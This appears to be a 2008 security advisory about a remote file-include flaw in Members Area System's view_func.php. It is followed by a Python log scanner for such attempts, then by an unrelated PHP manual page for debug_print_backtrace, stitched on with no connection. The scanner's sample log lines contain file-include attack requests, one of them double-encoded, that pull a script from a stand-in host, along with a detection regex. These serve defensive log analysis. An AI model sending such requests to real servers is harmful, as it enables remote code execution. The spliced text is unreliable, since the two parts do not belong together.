S-126: Members Area System 'view_func.php' Vulnerability


 
01-22-2008

Members Area System is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. The risk is MEDIUM. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
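
Added example (not part of the advisory and not code from Members Area System): a Python check that scans web-server access logs for requests to view_func.php in which any query parameter decodes to a remote URL, which is the request shape a remote file-include attempt leaves behind. The log lines, hosts and the parameter names "page", "id" and "ref" are constructed; the advisory does not name the affected parameter, so every parameter is checked.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines; the addresses, hosts and the
# parameter names "page", "id" and "ref" are made up for illustration.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Jan/2008:10:01:02 +0000] "GET /members/view_func.php?id=42 HTTP/1.1" 200 5120
192.0.2.44 - - [22/Jan/2008:10:03:17 +0000] "GET /members/view_func.php?page=http%3A%2F%2Fremote.example%2Finc.txt%3F HTTP/1.1" 200 911
192.0.2.44 - - [22/Jan/2008:10:03:40 +0000] "GET /members/view_func.php?page=%2568ttp://remote.example/inc.txt HTTP/1.1" 200 640
192.0.2.51 - - [22/Jan/2008:10:05:00 +0000] "GET /index.php?ref=http://www.example.org/ HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with one of these schemes names a remote file.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded), e.g. %2568ttp -> %68ttp -> http."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_text, script="view_func.php"):
    """Return (client_ip, parameter, decoded_value) for each flagged parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        url = urlsplit(target)
        # Only the script named in the advisory is in scope.
        if not url.path.lower().endswith("/" + script):
            continue
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(raw)
            if REMOTE_RE.search(value):
                hits.append((client, name, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit shows that a request of this shape was received, not that the include succeeded; correlate it with outbound connections from the web server to the host in the flagged value.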


DEBUG_PRINT_BACKTRACE(3)                        1                        DEBUG_PRINT_BACKTRACE(3)

debug_print_backtrace - Prints a backtrace

SYNOPSIS
       void debug_print_backtrace ([int $options], [int $limit])

DESCRIPTION
       debug_print_backtrace(3) prints a PHP backtrace. It prints the function calls, included/required files and eval(3)ed stuff.

PARAMETERS
       o $options - As of 5.3.6, this parameter is a bitmask for the following options:

         debug_print_backtrace(3) options
         +----------------------------+---------------------------------------------------+
         |DEBUG_BACKTRACE_IGNORE_ARGS | Whether or not to omit the "args" index, and      |
         |                            | thus all the function/method arguments, to save   |
         |                            | memory.                                           |
         +----------------------------+---------------------------------------------------+

       o $limit - As of 5.4.0, this parameter can be used to limit the number of stack frames printed. By default ($limit= 0) it prints all stack frames.

RETURN VALUES
       No value is returned.

CHANGELOG
       +--------+-----------------------------------------+
       |Version | Description                             |
       +--------+-----------------------------------------+
       | 5.4.0  | Added the optional parameter $limit.    |
       | 5.3.6  | Added the optional parameter $options.  |
       +--------+-----------------------------------------+

EXAMPLES
       Example #1 debug_print_backtrace(3) example

       <?php
       // include.php file

       function a() {
           b();
       }

       function b() {
           c();
       }

       function c(){
           debug_print_backtrace();
       }

       a();

       ?>

       <?php
       // test.php file
       // this is the file you should run

       include 'include.php';
       ?>

       The above example will output something similar to:

       #0 c() called at [/tmp/include.php:10]
       #1 b() called at [/tmp/include.php:6]
       #2 a() called at [/tmp/include.php:17]
       #3 include(/tmp/include.php) called at [/tmp/test.php:3]

SEE ALSO
       debug_backtrace(3).

PHP Documentation Group                                                  DEBUG_PRINT_BACKTRACE(3)